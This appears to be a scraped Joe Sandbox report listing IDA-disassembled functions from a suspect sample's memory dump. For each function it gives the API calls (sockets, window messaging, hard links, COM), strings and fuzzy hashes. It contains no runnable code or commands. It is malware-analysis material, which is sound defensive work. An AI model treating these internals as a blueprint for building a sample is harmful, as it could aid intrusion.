Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 741861332c2f4d04d64ea7bce2f99265fbb76d24030d475a36f79ba2002fad08
Instruction ID: cfc34403f3f6d595c396dcaec67ca3c5c1230e5cb5e3cc5af9bffa61ffc270b7
Opcode Fuzzy Hash: 741861332c2f4d04d64ea7bce2f99265fbb76d24030d475a36f79ba2002fad08
Instruction Fuzzy Hash: 6831B072200245AFEF259E38DC45BDA77A9EB09334F204329F975A21D2D778EC509B50

Function 00706E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00706EED
VariantCopyInd.OLEAUT32(?,?), ref: 00706F08
VariantClear.OLEAUT32(?), ref: 00706F12

Strings

*jp, xrefs: 00706E8B, 00706E90, 00706EF8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jp
API String ID: 2173805711-93120565
Opcode ID: dc0dd8ba88cf6aff0418fa0e65a592e7c8a3f2a075c5c9efa24fae34eb454ac5
Instruction ID: 5b3c1f2cdea079008f96e768deb8176dc23a8ffb2538e88ff3a70f5686cc1dbf
Opcode Fuzzy Hash: dc0dd8ba88cf6aff0418fa0e65a592e7c8a3f2a075c5c9efa24fae34eb454ac5
Instruction Fuzzy Hash: 51317371604246DFCB05BFA4E8619BD77B6FF45B00B1045ADF9025B2E2CB38AD21DB94

Function 0072304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0072335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00723077,?,?), ref: 00723378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0072307A
_wcslen.LIBCMT ref: 0072309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00723106

Strings

255.255.255.255, xrefs: 00723095, 0072309A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: a050ac09e25e6383d33d2fc820a313d1ae1d653728b7dc671bf09e770f50bc08
Instruction ID: db5b3eae0c393ecf382a92312da3f431f7597c4c1563a68dae500d051b3dbb12
Opcode Fuzzy Hash: a050ac09e25e6383d33d2fc820a313d1ae1d653728b7dc671bf09e770f50bc08
Instruction Fuzzy Hash: 4331B0352002259FDB20CF68D486EAA77E1EF15318F248459E9158B392DB7EEF41CB70

Function 00734653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00734705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00734713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0073471A

Strings

msctls_updown32, xrefs: 00734684

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 2caa4e7974324a902149034c69d4e480101339417a285691e3ad28790aa2384a
Instruction ID: d544ebcaaf014f5b08f46947b5a8584efad117a67e55ba6fc5fde4c597980978
Opcode Fuzzy Hash: 2caa4e7974324a902149034c69d4e480101339417a285691e3ad28790aa2384a
Instruction Fuzzy Hash: ED218EB5600208AFEB15DF68DC81DA737ADEB4A3A4B040049FA049B292CB34FC51CB64

Function 007095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0070961D

Strings

#requireadmin, xrefs: 007095D9
#notrayicon, xrefs: 007095B7
#OnAutoItStartRegister, xrefs: 007095F3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 3b3ef71f497887b85eb28df1b4e4b769dd4504ca74d217bfc88b76eaedcedad0
Instruction ID: 18bd9e387c2948362e2ffc1ff854b1acdd99b7a952284e26b84a9093e1e39678
Opcode Fuzzy Hash: 3b3ef71f497887b85eb28df1b4e4b769dd4504ca74d217bfc88b76eaedcedad0
Instruction Fuzzy Hash: B821F6B2104511FAD331BB259C02FB7B3D9DF55310F14412EFA49971C3EB5A9D51C2A9

Function 007337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00733840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00733850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00733876

Strings

Listbox, xrefs: 0073380F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: d8e5db9608363c864385bfc6c418f5f9c8c7d3f966c9c7db7f65b698b5b52f74
Instruction ID: 42b450c8752c7774a7e41c1436ec190cd53fbeb4fe135ff70589103d21c45eff
Opcode Fuzzy Hash: d8e5db9608363c864385bfc6c418f5f9c8c7d3f966c9c7db7f65b698b5b52f74
Instruction Fuzzy Hash: E021BE72610218BBFB218F54CC85EEB376AEF89760F108124F9049B191C679DC528BA0

Function 007149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00714A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00714A5C
SetErrorMode.KERNEL32(00000000,?,?,0073CC08), ref: 00714AD0

Strings

%lu, xrefs: 00714A6F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: c5a213d6848a4408f52b376e824fd5b39979ab693d448f3b6b2ab58b5cfbfd29
Instruction ID: cb170029d758d65edacdda948b7ae62ed7a3399b4f28d2a3d1d85fef7df0470b
Opcode Fuzzy Hash: c5a213d6848a4408f52b376e824fd5b39979ab693d448f3b6b2ab58b5cfbfd29
Instruction Fuzzy Hash: ED319375A00108AFD710DF54C885EAA7BF9EF05304F148098F905DB352D775ED45CB61

Function 007341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0073424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00734264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00734271

Strings

msctls_trackbar32, xrefs: 00734226

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 57405de43975b38806ee998c30c825e9e2143d80186ce07b087349f949837cfd
Instruction ID: aaf957582c7a7f2fe527584eec4b2bd8fae69d44281804eab91ad1e0dad84cf3
Opcode Fuzzy Hash: 57405de43975b38806ee998c30c825e9e2143d80186ce07b087349f949837cfd
Instruction Fuzzy Hash: A611E031240208BEFF209E29CC06FAB3BACEF85B64F010128FA55E20A1D275EC519B24

Function 00702F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

Part of subcall function 00702DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00702DC5
Part of subcall function 00702DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00702DD6
Part of subcall function 00702DA7: GetCurrentThreadId.KERNEL32 ref: 00702DDD
Part of subcall function 00702DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00702DE4

GetFocus.USER32 ref: 00702F78

Part of subcall function 00702DEE: GetParent.USER32(00000000), ref: 00702DF9

GetClassNameW.USER32(?,?,00000100), ref: 00702FC3
EnumChildWindows.USER32(?,0070303B), ref: 00702FEB

Strings

%s%d, xrefs: 00702FFF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: f2d8825d476a3368c2a4428391fefb9a236c50065d71ce948578d0d3a7cf71d0
Instruction ID: f0e49381a26ccbec12e025c07b2a0eeb443600d25fab1587c7d2e22dcd5b6bf3
Opcode Fuzzy Hash: f2d8825d476a3368c2a4428391fefb9a236c50065d71ce948578d0d3a7cf71d0
Instruction Fuzzy Hash: 1211A571700205EBDF557F60CD8AEED77AAAF84304F048179B909AB292DE389D458B70

Function 00735882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007358C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007358EE
DrawMenuBar.USER32(?), ref: 007358FD

Strings

0, xrefs: 0073588F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: ddb91628aa797a1a2b12b83b6d9e531b759e62ca14839a5a735fd39fce5b6702
Instruction ID: b180e06f6cbc8bb2d56fdce2555b2d932c1ce83df396fe9c093ebe25a8f30871
Opcode Fuzzy Hash: ddb91628aa797a1a2b12b83b6d9e531b759e62ca14839a5a735fd39fce5b6702
Instruction Fuzzy Hash: D601C072500218EFEB619F11DC44BEEBBB5FF45361F108099E848D6162DB349A90DF31

Function 0070007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154214863d6c95753a4e4eeae66ad26555f733ff76084db7707b4e39bc29e638
Instruction ID: cb24bacaf032ce2f4eec77006387ddcb3c7c513050a415d168a9e233a9d40d34
Opcode Fuzzy Hash: 154214863d6c95753a4e4eeae66ad26555f733ff76084db7707b4e39bc29e638
Instruction Fuzzy Hash: 01C14A75A0020AEFDB15CF94C894BAEB7B5FF48324F108698E505EB291D735DE41DB90

Function 0072342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00723459
CoUninitialize.OLE32 ref: 00723463
VariantInit.OLEAUT32(?), ref: 0072346E
VariantClear.OLEAUT32(?), ref: 0072371B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 63f5d9529ec3881b6d061af37956bd0dc535072b2bbedff3faeb7e50ff083090
Instruction ID: 998ca5ac682de1fcaa4ad5896f682f1a46ec29df3e7659360874404d48ce2718
Opcode Fuzzy Hash: 63f5d9529ec3881b6d061af37956bd0dc535072b2bbedff3faeb7e50ff083090
Instruction Fuzzy Hash: CBA14B756042109FC700EF28D885A2AB7E5FF89714F04885DF98A9B362DB38EE41CF95

Function 00700436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0073FC08,?), ref: 007005F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0073FC08,?), ref: 00700608
CLSIDFromProgID.OLE32(?,?,00000000,0073CC40,000000FF,?,00000000,00000800,00000000,?,0073FC08,?), ref: 0070062D
_memcmp.LIBVCRUNTIME ref: 0070064E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: a0ebd3a64e3b82aa1c4261a733a1be0e2afe07bc5cec074be45d0e9441e267ce
Instruction ID: c1b7f75451e72aa6405368a140206537be626715736f07a76c6b3ac841f88fb2
Opcode Fuzzy Hash: a0ebd3a64e3b82aa1c4261a733a1be0e2afe07bc5cec074be45d0e9441e267ce
Instruction Fuzzy Hash: 2581FC75A00109EFCB04DF94C984EEEB7F9FF89315F204558E506AB291DB75AE06CBA0

Function 006E1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006E14C0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6eb4b95696de5a52055c43680dcae0290a014f703045bcd7cf7cef77925e24e0
Instruction ID: 899d48b519e8e75515011c4a36ecfd4b3eed6ebf16c735a13822f1465409d676
Opcode Fuzzy Hash: 6eb4b95696de5a52055c43680dcae0290a014f703045bcd7cf7cef77925e24e0
Instruction Fuzzy Hash: 2A41F971A01751DBDB216BFA8C45ABE3AE7EF43330F14422EF415DA3D2E6344941B265

Function 00736278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0113E488,?), ref: 007362E2
ScreenToClient.USER32(?,?), ref: 00736315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00736382

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5670d1c66874b80eb5c5adaa2eeaf1e2ddc31db315e39fdaf56c6766f994e444
Instruction ID: a101ca1d91636d884a4cd857d2b7ee0498b78238d46cbfad2bb8c3c59bf0dd46
Opcode Fuzzy Hash: 5670d1c66874b80eb5c5adaa2eeaf1e2ddc31db315e39fdaf56c6766f994e444
Instruction Fuzzy Hash: CA512875A00249EFEF10DF68D880AAE7BB6FB45360F108169F9159B2A1D734ED81CB50

Function 00721AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00721AFD
WSAGetLastError.WSOCK32 ref: 00721B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00721B8A
WSAGetLastError.WSOCK32 ref: 00721B94

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: cd094938407b95fa65e28e6d47345692c58e2ed0aed746cd154ad9788911593d
Instruction ID: 22d4808ad67bff98c2dfc6a761b9f8c869a3e585618e4f92c1bc7d3e3c104822
Opcode Fuzzy Hash: cd094938407b95fa65e28e6d47345692c58e2ed0aed746cd154ad9788911593d
Instruction Fuzzy Hash: 5841CE74600200AFE720AF20D886F6A77E6AB45718F54848CFA1A9F2D2D776ED418B94

Function 006DB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd75ea92fc90a24c15076fffd69a6871c6d42f8891635da1c0c5a2b6ece2596
Instruction ID: e657bfb4d8355866fda84097156fb4e2267f30b820b05b1564a4776081ec3f06
Opcode Fuzzy Hash: 7dd75ea92fc90a24c15076fffd69a6871c6d42f8891635da1c0c5a2b6ece2596
Instruction Fuzzy Hash: 8E41BE71E00344AFD7249F68C841BAABBEAEB88720F11452FF151DB386D771A9018794

Function 007156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00715783
GetLastError.KERNEL32(?,00000000), ref: 007157A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007157CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007157FA

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 0b583b4e2448a671c0498ecf66d1874711a7792fd6309cbe42667521b48ca950
Instruction ID: 7b69130f704ea68f15aa0611b074ea60db8d8a24db4de6e1144ae4d855b624f7
Opcode Fuzzy Hash: 0b583b4e2448a671c0498ecf66d1874711a7792fd6309cbe42667521b48ca950
Instruction Fuzzy Hash: 6941FD35600610DFCB15EF15C545A5EBBE2EF89720B19C488E84A6B3A2CB34FD41CF95

Function 006DD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,006C6D71,00000000,00000000,006C82D9,?,006C82D9,?,00000001,006C6D71,?,00000001,006C82D9,006C82D9), ref: 006DD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006DD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 006DD9AB
__freea.LIBCMT ref: 006DD9B4

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
